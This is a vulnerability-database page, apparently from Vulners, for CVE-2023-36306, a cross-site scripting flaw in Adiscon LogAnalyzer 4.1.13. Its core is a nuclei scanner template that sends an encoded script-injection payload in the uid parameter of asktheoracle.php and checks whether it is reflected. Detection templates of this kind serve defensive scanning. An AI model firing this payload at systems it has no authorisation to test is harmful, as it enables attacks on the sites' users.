Lucene search

K

Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting

🗓️ 17 Oct 2023 07:28:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Adiscon LogAnalyzer v.4.1.13 - XSS vulnerability via asktheoracle.ph

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Vulnerability
4 Aug 202300:00
zdt
NVD
CVE-2023-36306
8 Aug 202315:15
nvd
Cvelist
CVE-2023-36306
8 Aug 202300:00
cvelist
Packet Storm
Adiscon LogAnalyzer 4.1.13 Cross Site Scripting
4 Aug 202300:00
packetstorm
CVE
CVE-2023-36306
8 Aug 202315:15
cve
Exploit DB
Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
4 Aug 202300:00
exploitdb
Vulnrichment
CVE-2023-36306
8 Aug 202300:00
vulnrichment
Prion
Cross site scripting
8 Aug 202315:15
prion
id: CVE-2023-36306

info:
  name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
  reference:
    - https://www.exploit-db.com/exploits/51643
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36306
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-36306
    cwe-id: CWE-79
    epss-score: 0.00385
    epss-percentile: 0.73054
    cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adiscon
    product: loganalyzer
  tags: cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer

http:
  - method: GET
    path:
      - "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
        condition: and
# digest: 4b0a00483046022100f89181b8b3e6fb6bb403c64c1183e88a70c92f6b751a9ca215286ff3efe427fc022100b0569aadea5c3c8276bbf24162125100f1146fa720c0f7dfa27b991b7b732464:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Oct 2023 07:20Current
6Medium risk
Vulners AI Score6
CVSS36.1
EPSS0.0298
SSVC
14
.json
Report